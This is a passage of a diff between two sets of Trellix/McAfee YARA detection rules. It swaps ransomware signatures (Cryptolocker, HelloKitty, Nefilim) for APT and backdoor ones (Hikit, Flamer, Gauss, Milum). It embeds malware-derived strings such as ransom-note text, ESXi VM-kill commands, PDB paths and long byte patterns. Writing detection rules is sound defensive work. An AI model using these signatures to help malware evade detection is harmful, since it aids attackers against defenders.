with the help of third parties may cause increased price" fullword wide - $s13 = "After payment we will send you the decryption tool that will decrypt all your files." fullword wide + $s1 = "c:\\Documents and Settings\\admin\\Desktop\\Babar64\\Babar64\\obj\\DllWrapper Release\\Release.pdb" fullword ascii + $s2 = "%COMMON_APPDATA%" fullword ascii + $s3 = "%%WINDIR%%\\%s\\%s" fullword ascii + $s4 = "/s /n %s \"%s\"" fullword ascii + $s5 = "/c start /wait " fullword ascii + $s6 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\" fullword ascii + $s7 = "constructor or from DllMain." fullword ascii + $s8 = "ComSpec" fullword ascii + $s9 = "APPDATA" fullword ascii + $s10 = "WINDIR" fullword ascii + $s11 = "USERPROFILE" fullword ascii condition: - ( uint16(0)==0x5a4d and filesize <800KB) and all of them + uint16(0)==0x5a4d and filesize <2000KB and all of them } -rule TRELLIX_ARC_Cryptolocker_Set1 : RANSOMWARE +rule TRELLIX_ARC_Chimera_Recordedtv_Modified : TROJAN FILE { meta: - description = "Detection of Cryptolocker Samples" - author = "Christiaan Beek, Christiaan_Beek@McAfee.com" - id = "13ccc6d3-c2cc-59ac-81af-ec11fb78cd41" - date = "2014-04-13" + description = "Rule to detect the modified version of RecordedTV.ms found in the Operation Skeleton" + author = "Marc Rivero | McAfee ATR Team" + id = "b0969713-41a4-550c-9545-f02783fa8d02" + date = "2020-04-21" modified = "2020-08-14" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Cryptolocker.yar#L1-L40" + reference = "https://medium.com/@cycraft_corp/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_operation_skeleton.yar#L1-L33" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "5be8d077537a59d860a972392be186d2697e55778f750d03b0fd3b0a73f714d9" + hash = "66f13964c87fc6fe093a9d8cc0de0bf2b3bdaea9564210283fdb97a1dde9893b" + logic_hash = "7165779b66999259a079fa68f898c5f9fb634adcb9d249366d321dff1014184b" score = 75 quality = 70 - tags = "RANSOMWARE" + tags = "TROJAN, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/Cryptolocker" - actor_type = "Cybercrime" + malware_type = "trojan" + malware_family = "Trojan:W32/RecordedTV" + actor_type = "Apt" actor_group = "Unknown" strings: - $string0 = "static" - $string1 = " kscdS" - $string2 = "Romantic" - $string3 = "CompanyName" wide - $string4 = "ProductVersion" wide - $string5 = "9%9R9f9q9" - $string6 = "IDR_VERSION1" wide - $string7 = " </trustInfo>" - $string8 = "LookFor" wide - $string9 = ":n;t;y;" - $string10 = " <requestedExecutionLevel level" - $string11 = "VS_VERSION_INFO" wide - $string12 = "2.0.1.0" wide - $string13 = "<assembly xmlns" - $string14 = " <trustInfo xmlns" - $string15 = "srtWd@@" - $string16 = "515]5z5" - $string17 = "C:\\lZbvnoVe.exe" wide + $byte = { C0 0E 5B C3 } + $s1 = "Encrypted file: CRC failed in %s (password incorrect ?)" fullword wide + $s2 = "EBorland C++ - Copyright 1999 Inprise Corporation" fullword ascii + $s3 = " MacOS file type: %c%c%c%c ; " fullword wide + $s4 = "rar.lng" fullword ascii condition: - 12 of ($string*) + uint16(0)==0x5a4d and filesize <900KB and all of them } -rule TRELLIX_ARC_Cryptolocker_Rule2 : RANSOMWARE +rule TRELLIX_ARC_Apt_Hikit_Rootkit : ROOTKIT FILE { meta: - description = "Detection of CryptoLocker Variants" - author = "Christiaan Beek, Christiaan_Beek@McAfee.com" - id = "a6e808ef-4f60-5592-9440-69309784efb1" - date = "2014-04-14" + description = "Rule to detect the rootkit hikit based on PDB" + author = "Marc Rivero | McAfee ATR Team" + id = "c53acbc6-8f4a-590b-8dd7-ce4da6d79cf8" + date = "2012-08-20" modified = "2020-08-14" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Cryptolocker.yar#L42-L79" + reference = "https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_hikit_rootkit_pdb.yar#L1-L28" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "e8e03516cc0b669000c8d6b443be7a5f7a8b904abba98fd3c7d4f038de6741ab" + logic_hash = "8a425ababdfbe95bd8ac7d4f519be16c0f1fd0b7eea2874124db2f00dd6eb56d" score = 75 quality = 70 - tags = "RANSOMWARE" + tags = "ROOTKIT, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/Cryptolocker" + malware_type = "rootkit" + malware_family = "Rootkit:W32/Hikit" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $string0 = "2.0.1.7" wide - $string1 = " <security>" - $string2 = "Romantic" - $string3 = "ProductVersion" wide - $string4 = "9%9R9f9q9" - $string5 = "IDR_VERSION1" wide - $string6 = "button" - $string7 = " </security>" - $string8 = "VFileInfo" wide - $string9 = "LookFor" wide - $string10 = " </requestedPrivileges>" - $string11 = " uiAccess" - $string12 = " <trustInfo xmlns" - $string13 = "last.inf" - $string14 = " manifestVersion" - $string15 = "FFFF04E3" wide - $string16 = "3,31363H3P3m3u3z3" + $pdb = "\\JmVodServer\\hikit\\bin32\\RServer.pdb" + $pdb1 = "\\JmVodServer\\hikit\\bin32\\w7fw.pdb" + $pdb2 = "\\JmVodServer\\hikit\\bin32\\w7fw_2k.pdb" + $pdb3 = "\\JmVodServer\\hikit\\bin64\\w7fw_x64.pdb" condition: - 12 of ($string*) + uint16(0)==0x5a4d and filesize <100KB and any of them } -rule TRELLIX_ARC_Ransom_Linux_Hellokitty_0721 : RANSOMWARE FILE +rule TRELLIX_ARC_Apt_Gdocupload_Glooxmail : BACKDOOR FILE { meta: - description = "rule to detect Linux variant of the Hello Kitty Ransomware" - author = "Christiaan @ ATR" - id = "097b02e7-93d8-5d4f-9964-7b660b3cd7b9" - date = "2021-07-19" - modified = "2021-07-19" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Linux_HelloKitty0721.yar#L1-L28" + description = "Rule to detect gdocupload tool used by APT1" + author = "Marc Rivero | McAfee ATR Team" + id = "deb20196-65e6-5dac-af0c-2f16e5926715" + date = "2013-02-19" + modified = "2020-08-14" + reference = "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_gdocupload_pdb.yar#L1-L32" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "77a3809df4c7c591a855aaecd702af62935952937bb81661aa7f68e64dcf4fb4" + hash = "295c5c7aa5fa29628dec9f42ed657fce0bc789079c4e51932bcbc99a28dfd440" + logic_hash = "e016bb636af22fae79875bebaf1b4bd4f2a403e797d7ee52ea0691b4d7a54cf8" score = 75 - quality = 70 - tags = "RANSOMWARE, FILE" - Rule_Version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:Linux/HelloKitty" - hash1 = "ca607e431062ee49a21d69d722750e5edbd8ffabcb54fa92b231814101756041" - hash2 = "556e5cb5e4e77678110961c8d9260a726a363e00bf8d278e5302cb4bfccc3eed" + quality = 45 + tags = "BACKDOOR, FILE" + rule_version = "v1" + malware_type = "backdoor" + malware_family = "Backdoor:W32/Gdocupload" + actor_type = "Cybercrime" + actor_group = "Unknown" strings: - $v1 = "esxcli vm process kill -t=force -w=%d" fullword ascii - $v2 = "esxcli vm process kill -t=hard -w=%d" fullword ascii - $v3 = "esxcli vm process kill -t=soft -w=%d" fullword ascii - $v4 = "error encrypt: %s rename back:%s" fullword ascii - $v5 = "esxcli vm process list" fullword ascii - $v6 = "Total VM run on host:" fullword ascii - $v7 = "error lock_exclusively:%s owner pid:%d" fullword ascii - $v8 = "Error open %s in try_lock_exclusively" fullword ascii - $v9 = "Mode:%d Verbose:%d Daemon:%d AESNI:%d RDRAND:%d " fullword ascii - $v10 = "pthread_cond_signal() error" fullword ascii - $v11 = "ChaCha20 for x86_64, CRYPTOGAMS by <appro@openssl.org>" fullword ascii + $s1 = "https://www.google.com/accounts/ServiceLogin?service=writely&passive=1209600&continue=http://docs.google.com/&followup=http://do" ascii + $s2 = "Referer: http://sn114w.snt114.mail.live.com/mail/AttachmentUploader.aspx?_ec=1" fullword ascii + $s3 = "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET " ascii + $s4 = "e:\\Project\\mm\\Webmail\\Bin\\gdocs.pdb" fullword ascii + $s5 = "http://docs.google.com/?auth=" fullword ascii + $s6 = "x-guploader-client-info: mechanism=scotty flash; clientVersion=18067216" fullword ascii + $s7 = "http://docs.google.com/" fullword ascii + $s8 = "Referer: http://sn114w.snt114.mail.live.com/mail/EditMessageLight.aspx?n=%s" fullword ascii condition: - ( uint16(0)==0x457f and filesize <200KB and (8 of them )) or ( all of them ) + uint16(0)==0x5a4d and filesize <300KB and all of them } -rule TRELLIX_ARC_Jeff_Dev_Ransomware : RANSOMWARE FILE +rule TRELLIX_ARC_Apt_Flamer_Pdb : BACKDOOR FILE { meta: - description = "Rule to detect Jeff Dev Ransomware" + description = "Rule to detect Flamer based on the PDB" author = "Marc Rivero | McAfee ATR Team" - id = "dd5e24f4-a2d8-5db5-9e7e-7f8bded5d401" - date = "2018-08-26" + id = "3bbe043d-c0dc-5aa2-b985-800a6d9038fd" + date = "2012-05-29" modified = "2020-08-14" - reference = "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_jeff_dev.yar#L1-L28" + reference = "https://www.forcepoint.com/ko/blog/x-labs/flameflamerskywiper-one-most-advanced-malware-found-yet" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/flamer_pdb.yar#L1-L25" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "386d4617046790f7f1fcf37505be4ffe51d165ba7cbd42324aed723288ca7e0a" - logic_hash = "58a408f4e1781540e4abdb87b85b94c1f0ea49b40bf241d6d074bc2162ac2032" + hash = "554924ebdde8e68cb8d367b8e9a016c5908640954ec9fb936ece07ac4c5e1b75" + logic_hash = "3c1d3d015e086cff1f3d5add39397d8ed251b12144b31d8547165cbd0217735c" score = 75 - quality = 45 - tags = "RANSOMWARE, FILE" + quality = 70 + tags = "BACKDOOR, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/Jeff" - actor_type = "Cybercrime" + malware_type = "backdoor" + malware_family = "Backdoor:W32/Flamer" + actor_type = "Apt" actor_group = "Unknown" strings: - $s1 = "C:\\Users\\Umut\\Desktop\\takemeon" fullword wide - $s2 = "C:\\Users\\Umut\\Desktop\\" fullword ascii - $s3 = "PRESS HERE TO STOP THIS CREEPY SOUND AND VIEW WHAT HAPPENED TO YOUR COMPUTER" fullword wide - $s4 = "WHAT YOU DO TO MY COMPUTER??!??!!!" fullword wide + $pdb = "\\Projects\\Jimmy\\jimmydll_v2.0\\JimmyForClan\\Jimmy\\bin\\srelease\\jimmydll\\indsvc32.pdb" condition: - ( uint16(0)==0x5a4d and filesize <5000KB) and all of them + uint16(0)==0x5a4d and filesize <500KB and any of them } -import "pe" - -rule TRELLIX_ARC_Nefilim_Ransomware : RANSOMWARE FILE +rule TRELLIX_ARC_Apt_Gauss_Pdb : BACKDOOR FILE { meta: - description = "Rule to detect Nefilim ransomware" + description = "Rule to detect Gauss based on PDB" author = "Marc Rivero | McAfee ATR Team" - id = "55d9cb20-5071-5dce-a46f-a20816ba379f" - date = "2020-03-17" - modified = "2020-04-03" - reference = "https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_NEFILIM.yar#L3-L48" + id = "209223cc-16e5-5596-8744-21ad71b5ec2a" + date = "2012-08-14" + modified = "2020-08-14" + reference = "https://securelist.com/the-mystery-of-the-encrypted-gauss-payload-5/33561/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/gauss_pdb.yar#L1-L25" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "5ab834f599c6ad35fcd0a168d93c52c399c6de7d1c20f33e25cb1fdb25aec9c6" - logic_hash = "d8cd5d2dd552d3e9f57f7bd244e941fe89a96ab16bbcc71911e8e2a519f53f03" + hash = "7b0d0612b4ecc889a901115c2e77776ef0ea65c056b283d12e80f863062cea28" + logic_hash = "cb20c87ea976f395e000f2c631ffd52b09dca2af37adceafe5be72b37f75a997" score = 75 quality = 70 - tags = "RANSOMWARE, FILE" + tags = "BACKDOOR, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/Nefilim" - actor_type = "Cybercrime" + malware_type = "backdoor" + malware_family = "Backdoor:W32/Gauss" + actor_type = "Apt" actor_group = "Unknown" strings: - $s1 = "C:\\Users\\Administrator\\Desktop\\New folder\\Release\\NEFILIM.pdb" fullword ascii - $s2 = "oh how i did it??? bypass sofos hah" fullword ascii - $s3 = " /c timeout /t 3 /nobreak && del \"" fullword wide - $s4 = "NEFILIM-DECRYPT.txt" fullword wide - $op0 = { db ff ff ff 55 8b ec 83 ec 24 53 56 57 89 55 f4 } - $op1 = { 60 be 00 d0 40 00 8d be 00 40 ff ff 57 eb 0b 90 } - $op2 = { 84 e0 40 00 90 d1 40 00 08 } - $bp = { 558B??83????53565789????29????6A??8D????8D????5A8B??89????8A????88????8B????8A????88??8A????88????8A??88????03??03??FF????75??89????8D????8D????8D????89????89????29????89????29????89????29????8D????8D????89????29????89????29????8B????89????29????8D????F6??????8B????8A????8B????8A????8A??88????8B????8A????88????75??0FB6??8A??????????0FB6??88????8A??????????0FB6????8A??????????88????0FB6????8A??????????88????8B????C1????32??????????8B????8A????32??8B????88????8A????32??88????8A??32????83????88????8B????8A????32????FF????88??83????83????83??????0F82????????5F5E5BC9C3558B??560FB6??57C1????03????6A??5F6A??5E8A??30??40414E75??4F75??5F5E5DC356576A??5F6A??8B??5E0FB6??8A??????????88??83????4E75??414F75??5F5EC38A????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????8A????88????88????C3558B??5153566A??83????5E8A????32??8A????8A????88????32??32??88????88????32??8A??C0????B3??F6??02??32??32????8A????32????32??88????8A??C0????F6??02??32??32????8A????32????88????8A??C0????F6??02??32??32??8A????32????32????88??8A??C0????F6??02??32??32????83????32????4E88????75??5E5BC9C3558B??53FF????8B??32??E8????????59B3??8B??E8????????8B??E8????????8B??E8????????FF????8B??8A??E8????????FE??5980????72??8B??E8????????8B??E8????????5B8B??B0??5DE9????????558B??81??????????53568D??????????E8????????33??6A??5939????76??5783????75??8B????8D????A5A5A58D??????????A5508D????E8????????596A??588B????8D????80????75??48C6????79??EB??FE????33??8A??????8B????30????43413B????72??5F8B????8B????6A??2B??5E8A????88??404E75??5E5BC9C3558B??81??????????53FF????8D??????????50FF??????????68????????8D??????????50FF??????????33??53536A??535368????????8D??????????50FF??????????89????3B??0F84????????56578D????5053BE????????5689????FF??????????5056E8????????83????85??75??53FF??????????FF????8B??????????53FF??50FF??????????8D????51505689????FF??????????5056E8????????83????85??74??8B????89????8D????50FF????E8????????59595385??74??8D????50FF????FF????FF????FF??????????FF????53FF??50FF??????????5F5E5BC9C3558B??83????81??????????535657FF????8D????????????50FF??????????8B??????????68????????8D????????????50FF??8D??????508D????????????50FF??????????89??????83????0F84????????8B??????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????68????????8D??????50FF??85??0F84????????F6????????FF????8D????????????5074??FF??????????8D??????508D????????????50FF??68????????8D????????????50FF??8D????????????50E8????????E9????????FF??????????8D??????508D????????????50FF??8D??????50E8????????8B??C7????????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??0F84????????68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????57FF??85??74??68????????8D??????50FF??85??74??8D????????????50E8????????598D??????50FF??????FF??????????85??0F85????????FF??????FF??????????5F5E5B8B??5DC3558B??81??????????53565768????????FF??????????8B??????????5033??57FF??8B??????????50FF??68????????89????FF??????????89????B8????????39????74??8B????2B??8A??FF????88????4039????75??57576A??575768????????FF????FF??????????89????3B??0F84????????8D????5150FF??????????6A??57FF??50FF??6A??5789????FF??50FF??FF????89????E8????????FF????E8????????595968????????57FF??50FF??68????????5789????FF??50FF??FF????8B????89????E8????????FF????8B????E8????????8B??????????59595757FF????FF????FF????FF??57FF??????????578D????5068????????FF????FF????FF??????????FF??????????83????0F84????????FF??????????83????0F84????????8B????8B????5705????????5713??5150FF????FF??578D????5068????????FF????FF????FF??????????8B????8B????5705????????5713??5150FF????FF??578D????5068????????FF??????????50FF????FF????FF??????????8B????8B????3B??0F8C????????7F??81??????????0F86????????89????89????3B??0F8C????????7F??3B??0F86????????EB??8B????2B????1B????89????0F88????????7F??81??????????0F82????????68????????57FF??50FF??????????5757FF????89????FF????FF????FF??578D????5068????????FF????FF????FF??????????FF????8B????FF????68????????FF????E8????????83????5757FF????FF????FF????FF??578D????5068????????FF????FF????FF??????????FF??FF????5750FF??????????81????????????8B????11????39????0F8C????????0F8F????????8B????39????0F82????????E9????????3B??7C??7F??81??????????76??68????????57FF??50FF??????????575733??89????5133??50FF????FF??578D????5068????????FF????FF????FF??????????FF????8B????FF????68????????FF????E8????????83????575733??5050FF????FF??578D????5068????????EB??5157FF??50FF??????????575733??89????5133??50FF????FF??578D????50FF????FF????FF????FF??????????FF????8B????FF????FF????FF????E8????????83????575733??5050FF????FF??578D????50FF????FF????FF????FF??????????FF????57FF??50FF??????????FF????FF??????????FF????57FF??8B??????????50FF??FF???? } + $pdb = "\\projects\\gauss\\bin\\release\\winshell.pdb" condition: - uint16(0)==0x5a4d and filesize <200KB and all of ($s*) or all of ($op*) or $bp + uint16(0)==0x5a4d and filesize <550KB and any of them } import "pe" -rule TRELLIX_ARC_Nefilim_Signed : RANSOMWARE FILE +rule TRELLIX_ARC_Milum_Trojan : TROJAN FILE { meta: - description = "Rule to detect Nefilim samples digitally signed" + description = "Rule to detect Milum trojan from the Wildpressure operation" author = "Marc Rivero | McAfee ATR Team" - id = "a9a5daf0-4cfb-556a-b20a-72283fb1a0f9" - date = "2020-04-02" + id = "acc56237-a93a-55c0-a90c-11ca1da683db" + date = "2020-04-24" modified = "2020-08-14" - reference = "https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_NEFILIM.yar#L50-L72" + reference = "https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_milum_wildpressure.yar#L3-L28" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "353ee5805bc5c7a98fb5d522b15743055484dc47144535628d102a4098532cd5" - logic_hash = "7625eb7de1ebb2f5410552b8983379f213d639f5e146a5d951975b69eb8111d3" + hash = "86456ebf6b807e8253faf1262e7a2b673131c80174f6133b253b2e5f0da442a9" + logic_hash = "3ab1ff129517cb4a829edac289c00d7701d6f667ba2ef5a28024fd01a3a52e8e" score = 75 quality = 70 - tags = "RANSOMWARE, FILE" + tags = "TROJAN, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/Nefilim" - actor_type = "Cybercrime" + malware_type = "trojan" + malware_family = "Trojan:W32/Milum" + actor_type = "Apt" actor_group = "Unknown" + strings: + $pattern = { 558B??6A??68????????64??????????5081??????????A1????????33??89????535657508D????64??????????8B????89??????????C7????????????8D????C7??????????33??6A??89??????????89????E8????????83????3B??0F84????????89????89??8B????89????8B????89????8B????C6??????8B????C6??????C6??????8B??????????BE????????89????89????88????C6??????6A??68????????8D??????????89??????????89??????????88??????????E8????????C6??????6A??538D????528D??????????89??????????89??????????88??????????E8????????C6??????8D??????????508B??E8????????508D??????????5157E8????????C6??????83????????????72??8B??????????52E8????????83????89??????????89??????????88??????????C6??????83????????????72??8B??????????50E8????????83????6A??68????????8D????89??????????89??????????88??????????89????89????88????E8????????C6??????6A??538D????518D????89????89????88????E8????????C6??????8D????528B??E8????????508D??????????5057E8????????C6??????83??????72??8B????51E8????????83????89????89????88????C6??????83??????72??8B????52E8????????83????6A??68????????8D????89????89????88????89????89????88????E8????????C6??????6A??538D????508D????89????89????88????E8????????C6??????83????8B??89??????????6A??89????89????68????????88??E8????????C6??????83????8B??89??????????6A??538D????89????89????5288??E8????????C6??????8D??????????50C6??????E8????????83????C6??????8B??????????2B??????????B8????????F7??03??C1????8B??C1????03??83????75??8B??????????6A??53528D????E8????????8B??????????6A??83????53508D????E8????????6A??538D????508D????89????89????88????E8????????C6??????6A??538D????518D????89????89????88????E8????????C6??????8D????528B??E8????????508D??????????5057E8????????C6??????BF????????39????72??8B????51E8????????83????89????89????88????C6??????39????72??8B????52E8????????83????89????89????88????C6??????8B??????????3B??74??8B??????????E8????????8B??????????50E8????????83????BF????????89??????????89??????????89??????????C6??????39????72??8B????51E8????????83????89????89????88????C6??????39????72??8B????52E8????????83????89????89????88????C6??????39????72??8B????50E8????????83????89????89????88????88????39????72??8B????51E8????????83????89????89????88????C7????????????39????72??8B????52E8????????83????8B??????????89????89????88????8B????64????????????595F5E5B8B????33??E8????????8B??5DC2????8D??????????508D??????????89??????????E8????????C6??????C7??????????????????C6??????68????????8D??????????51E8????????CCCC558B??6A??68????????64??????????5051535657A1????????33??508D????64??????????8B????C7??????????C7????????????8D????33??83??????89????72??8B??EB??8B??8D????88??8B????8B????518B??E8????????8B????89????8B????89??8B????89????89????88????83??????72??8B??50E8????????83????89????C7????????????88??83????89????89????C7????????????8B????8B??50518D????E8????????89????8B????52E8????????83????8B????64????????????595F5E5B8B??5DC2????CCCCCCCCCCCCCCCCCCCCCCCCCC558B??6A??68????????64??????????505156A1????????33??508D????64??????????83????C7????????????8B????5156E8????????C7????????????C7????????????8B??8B????64????????????595E8B??5DC2????CCCCCCCCCCCC558B??6A??68????????64??????????5081??????????A1????????33??89????535657508D????64??????????8B????33??8B??89??????????8B????8B??89??????????89??????????89??????????3B??0F84????????8D????39??????????0F85????????68????????8D????5750E8????????C7????????????83????8D????57518B??E8????????83????C6??????8B??????????6A??535083????E8????????C6??????BF????????39????72??8B????52E8????????83????C7????????????89????88????88????39????72??8B????50E8????????83????C7????????????89????88????E9????????578D????68????????51E8????????C7????????????508D??????????52BA????????E8????????C6??????83????8D????57518B??E8????????83????C6??????8B??????????6A??535083????E8????????C6??????BF????????39????72??8B????52E8????????83????C7????????????89????88????C6??????39??????????72??8B??????????50E8????????83????C7??????????????????89??????????88??????????88????39????72??8B????51E8????????83????C7????????????89????88????FF??????????38????75??8B????38????75??8B??8B??38????75??8D????8B??8B??38????74??EB??8B????38????75??3B????75??8B??8B????38????74??8B??8B??????????3B????0F85????????8B??????????8B??6A??5383????C7????????????89????508B??88??E8????????89????C7??????????????????8B??8B????64????????????595F5E5B8B????33??E8????????8B??5DC2????CCCCCCCCCCCCCCCCCCCCCCCCCCCC558B??6A??68????????64??????????50515356A1????????33??508D????64??????????8B??89????C7??????????33??89????83??????72??8B????50E8????????83????C7????????????89????88????C7????????????83??????72??8B????50E8????????83????C7????????????89????88????8B????64????????????595E5B8B??5DC3CCCCCCCCCC558B??6A??68????????64??????????5083????A1????????33??89????5356508D????64??????????33??89????538B??68????????8D????89????C7????????????89????88????E8????????C7????????????6A??8D????38????74??68????????EB??68????????E8????????8D????5083????8D????5651E8????????C6??????8D????52578B??E8????????83????C7????????????C6??????BE????????39????72??8B????50E8????????83????C7????????????89????88????88????39????72??8B????51E8????????83????C7????????????89????88????8B??8B????64????????????595E5B8B????33??E8????????8B??5DC3CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC558B??6A??68????????64??????????50515356A1????????33??508D????64??????????8B??89????C7??????????33??89????83??????72??8B????50E8????????83????C7????????????89????88????C7????????????83??????72??8B????50E8????????83????F6??????C7????????????89????88????74??56E8????????83????8B??8B????64????????????595E5B8B??5DC2????CCCC558B??6A??68????????64??????????50A1????????33??508D????64??????????C7????????????6A??6A??8D????5083????E8????????C7????????????83??????72??8B????51E8????????83????C7????????????C7????????????C6??????8B????64????????????598B??5DC2????CCCCCCCCCCCCCCCCCCCCCC558B??6A??68????????64??????????5083????A1????????33??89????535657508D????64??????????33??89????8B????89????89????B8????????89????C7????????????89????88??89????8D????BF????????39????72??8B??8B????39????73??8D????8B????518D????518B??E8????????C6??????508B??E8????????C6??????39????72??8B????52E8????????83????C7????????????89????88????88????39????72??8B????50E8????????83????C7????????????89????88????8B??8B????64????????????595F5E5B8B????33??E8????????8B??5DC2????CCCCCCCCCCCCCCCC558B??6A??68????????64??????????5081??????????A1????????33??89????535657508D????64??????????8B??33??89????8B????89??????????89?????????? } + condition: - uint16(0)==0x5a4d and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Red GmbH/CN=Red GmbH" and pe.signatures[i].serial=="00:b8:81:a7:2d:41:17:bb:c3:8b:81:d3:c6:5c:79:2c:1a" or pe.signatures[i].thumbprint=="5b:19:58:8b:78:74:0a:4c:5d:08:41:99:dc:0f:52:a6:1f:38:00:99") + uint16(0)==0x5a4d and filesize <2000KB and pe.imphash()=="548d9f5f1e74f34b85612667335d41f2" and all of them } -import "pe" - -rule TRELLIX_ARC_RANSOM_Nefilim_Go : RANSOMWARE FILE +rule TRELLIX_ARC_Apt_Manitsme_Trojan : TROJAN FILE { meta: - description = "Rule to detect the new Nefilim written in GO" + description = "Rule to detect the Manitsme trojan" author = "Marc Rivero | McAfee ATR Team" - id = "a8809060-c646-5d54-88e7-c8054305ee6c" - date = "2020-07-13" + id = "49e0c934-6920-5e49-837c-27ebbbd5a1a2" + date = "2013-03-08" modified = "2020-08-14" - reference = "https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_NEFILIM.yar#L74-L98" + reference = "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_manitsme_trojan_pdb.yar#L1-L36" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "a51fec27e478a1908fc58c96eb14f3719608ed925f1b44eb67bbcc67bd4c4099" - logic_hash = "f0b10286fb1623a32bcf1f30cadce2901f7711cb36db6bbe812f6c2e03862270" + hash = "c1c0ea096ec4d36c1312171de2a9ebe258c588528a20dbb06a7e3cf97bf1e197" + logic_hash = "584053145249a930d3eae5e291d3553c57fa427dbecac9f04e7c0169f153b7af" score = 75 quality = 70 - tags = "RANSOMWARE, FILE" + tags = "TROJAN, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/Nefilim" - actor_type = "Cybercrime" + malware_type = "trojan" + malware_family = 